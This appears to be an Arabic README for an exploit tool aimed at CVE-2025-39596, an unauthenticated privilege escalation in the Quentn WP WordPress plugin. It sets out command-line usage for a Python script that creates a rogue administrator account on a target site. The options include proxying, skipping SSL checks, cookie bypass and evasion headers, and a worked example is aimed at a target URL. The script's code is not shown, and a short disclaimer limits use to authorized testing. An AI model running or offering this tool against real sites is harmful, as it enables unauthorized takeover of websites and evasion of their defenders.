
Quentn WP <= 1.2.8 - تصعيد صلاحيات بدون مصادقة
Quentn WP <= 1.2.8 - تصعيد غير مصادق عليه للامتيازات
إضافة Quentn WP لـ WordPress عرضة لتصعيد الامتيازات في جميع الإصدارات حتى 1.2.8 وما يشملها. وهذا يسمح لـمهاجمين غير مصادَق عليهم بتصعيد صلاحياتهم إلى مستوى مدير (administrator).
CVE-2025-395969.8 (Critical)يحتوي هذا المستودع على استغلال بلغة Python لـ CVE-2025-39596، يتيح إنشاء مستخدم مدير جديد في WordPress بدون مصادقة عبر طلب API مُصمَّم بعناية.
الميزات:
python3 CVE-2025-39596.py -u <target_url> -e <email> [options]
الوسائط المطلوبة:
-u, --url رابط موقع WordPress المستهدف (مثال: http://127.0.0.1/wordpress)-e, --email البريد الإلكتروني لحساب المدير الجديدالوسائط الاختيارية:
-f, --fname الاسم الأول (الافتراضي: Pwn)-l, --lname الاسم الأخير (الافتراضي: Admin)-r, --role الدور المطلوب تعيينه (الافتراضي: administrator)-k, --key مفتاح API لمنصة Quentn إذا كان معروفًا--cookie كوكي لتجاوز المصادقة إذا كان متاحًا--proxy دعم البروكسي (مثال: http://127.0.0.1:8080)--skip-ssl تخطي التحقق من SSL--extra تفعيل ترويسات مراوغة إضافيةمثال:
python3 CVE-2025-39596.py -u http://target.com/wordpress -e [email protected] --fname Root --lname User --proxy http://127.0.0.1:8080 --extra
Exploit Success By | Nxploitedهذه الأداة مقدمة لأغراض الاختبار الأمني التعليمي والمصرح به فقط.
أي إساءة استخدام ممنوعة منعًا باتًا.
المؤلف غير مسؤول عن أي ضرر أو إساءة استخدام ناتجة عن هذا الكود.
بواسطة: Nxploited ( Khaled Alenazi )